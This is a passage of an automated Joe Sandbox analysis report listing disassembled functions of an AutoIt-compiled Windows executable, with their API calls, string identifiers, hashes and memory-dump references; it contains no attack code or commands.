                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                                    • API String ID: 0-1896584978
                                                                                                                                    • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                                    • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                                                                                    • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                                                                    • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                                                                                    Function 00476A8A Relevance: 27.3, APIs: 18, Instructions: 332COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitVariant
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1927566239-0
                                                                                                                                    • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                    • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                                                    • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                                    • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                                                                    Function 0046D6EB Relevance: 26.7, APIs: 6, Strings: 9, Instructions: 474COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                                                    • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                                                    • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                                                    • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                                                    • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                                                    • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                                                      • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                    • API String ID: 1322021666-1919597938
                                                                                                                                    • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                    • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                                                    • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                                    • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                                                    Function 0045DE12 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 190timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                                                                                    • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                                                                                    • __wsplitpath.LIBCMT ref: 0045DF54
                                                                                                                                    • _wcscat.LIBCMT ref: 0045DF6C
                                                                                                                                    • _wcscat.LIBCMT ref: 0045DF7E
                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                                                                                    • _wcscpy.LIBCMT ref: 0045E019
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 3201719729-438819550
                                                                                                                                    • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                                    • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                                                                                    • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                                                                                    • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                                                                                    Function 0043737D Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 83windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsicoll$IconLoad
                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                    • API String ID: 2485277191-404129466
                                                                                                                                    • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                    • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                                                                    • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                                                                    • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                                                                    Function 00428604 Relevance: 25.8, APIs: 17, Instructions: 306stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                                                                    • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                                                                    • strncnt.LIBCMT ref: 00428646
                                                                                                                                    • strncnt.LIBCMT ref: 0042865A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: strncnt$CompareErrorLastString
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1776594460-0
                                                                                                                                    • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                    • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                                                                    • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                                                                    • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                                                                    Function 004545C9 Relevance: 25.7, APIs: 17, Instructions: 198windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                                                                    • GetDesktopWindow.USER32 ref: 00454708
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                                                                    • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3869813825-0
                                                                                                                                    • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                                    • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                                                                    • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                                    • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                                                                    Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                                                                    • GetCursorInfo.USER32 ref: 00458E03
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Cursor$Load$Info
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2577412497-0
                                                                                                                                    • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                                    • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                                                                    • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                                    • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                                                                    Function 00469681 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                                                                    • GetFocus.USER32 ref: 004696E0
                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost$CtrlFocus
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1534620443-4108050209
                                                                                                                                    • Opcode ID: 833d13db40ec40dec0483232b6284f8533ca83f9805c84b893a2fb0fb577edd9
                                                                                                                                    • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                                                    • Opcode Fuzzy Hash: 833d13db40ec40dec0483232b6284f8533ca83f9805c84b893a2fb0fb577edd9
                                                                                                                                    • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                                                    Function 004680EB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 204windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00468107
                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                                    • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                                    • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                                    • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                                    • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                                    • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                                    • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                                    • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 3993528054-4108050209
                                                                                                                                    • Opcode ID: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                                                                                    • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                                                                    • Opcode Fuzzy Hash: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                                                                                    • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                                                                    Function 0046F2B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                                                                      • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                                      • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                                      • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                                    • SendMessageW.USER32(?), ref: 0046F34C
                                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                                                    • _wcscat.LIBCMT ref: 0046F3BC
                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                                                    • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                    • API String ID: 4085615965-3440237614
                                                                                                                                    • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                    • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                                    • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                    • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                                                                    Function 0044B988 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsicoll
                                                                                                                                    • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                    • API String ID: 3832890014-4202584635
                                                                                                                                    • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                                    • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                                                                    • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                                    • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                                                                    Function 00466999 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 312COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 004669C4
                                                                                                                                    • _wcsncpy.LIBCMT ref: 00466A21
                                                                                                                                    • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                    • _wcstok.LIBCMT ref: 00466A90
                                                                                                                                      • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                                                                    • _wcstok.LIBCMT ref: 00466B3F
                                                                                                                                    • _wcscpy.LIBCMT ref: 00466BC8
